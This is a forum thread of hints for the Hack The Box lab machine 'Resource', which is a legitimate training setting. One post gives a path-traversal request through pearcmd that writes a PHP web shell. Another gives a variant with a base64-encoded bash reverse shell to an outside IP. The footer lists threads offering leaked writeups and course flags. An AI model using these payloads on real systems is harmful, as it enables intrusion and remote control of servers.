Aug 04, 2024, 05:10 AM
(Aug 04, 2024, 05:06 AM)wranglerray Wrote: http://signserv.ssg.htb/docsoh wow great find
|
[HTB] Resource
by UnkownWombat - Saturday August 3, 2024 at 06:05 PM
|
|
Aug 04, 2024, 05:10 AM
(Aug 04, 2024, 05:06 AM)wranglerray Wrote: http://signserv.ssg.htb/docsoh wow great find
Aug 04, 2024, 05:13 AM
lol well it was actually netstat -ano
Aug 04, 2024, 05:17 AM
Aug 04, 2024, 05:22 AM
for those having issues with the foothold
GET /index.php?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?system($_GET['cmd']);?>+/var/www/itrc/uploads/shell.php put this in burp navigate to /uploads/shell.php
Aug 04, 2024, 05:41 AM
You can also do it this way
/index.php?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMTg0LzQ0NDQgMD4mMSc="));?>+/tmp/hello.php Just replace the base64 paylaod with your reverse shell base64 encoded
Aug 04, 2024, 05:48 AM
Can you explain how did you found this vulnerability.i mean how did you found that they using thinkphp
(Aug 04, 2024, 05:59 AM)insect1285 Wrote: Given clues about zzinter hash in the mysql db from earlier - anyone figured out how to get into it? Host is missing. just use mysql -u user -p -h db trying to crack hash for zzinter but i don't think it's possible
Aug 04, 2024, 06:08 AM
I rather think from messages and tickets we should sign public key from http://signserv.ssg.htb/. But how to authorize there.
Aug 04, 2024, 06:08 AM
(Aug 04, 2024, 05:41 AM)glock05 Wrote: You can also do it this way Where can i find the tmp/hello.php?
Aug 04, 2024, 06:14 AM
(Aug 04, 2024, 05:22 AM)wranglerray Wrote: for those having issues with the foothold How to find this usr/local/lib/php/pearcmd? |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] HackTheBox Dante - complete writeup written by Tamarisk | 602 | 91,594 |
45 minutes ago Last Post: sabero_exe |
||
| [FREE] CPTS 12 FLAGS | 68 | 1,944 |
9 hours ago Last Post: VictorPipeau |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 371 | 92,799 |
10 hours ago Last Post: phannguyenbaouy1 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 21 | 2,617 |
Today, 05:08 AM Last Post: popoler |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,269 |
Yesterday, 02:10 PM Last Post: kkkato |
||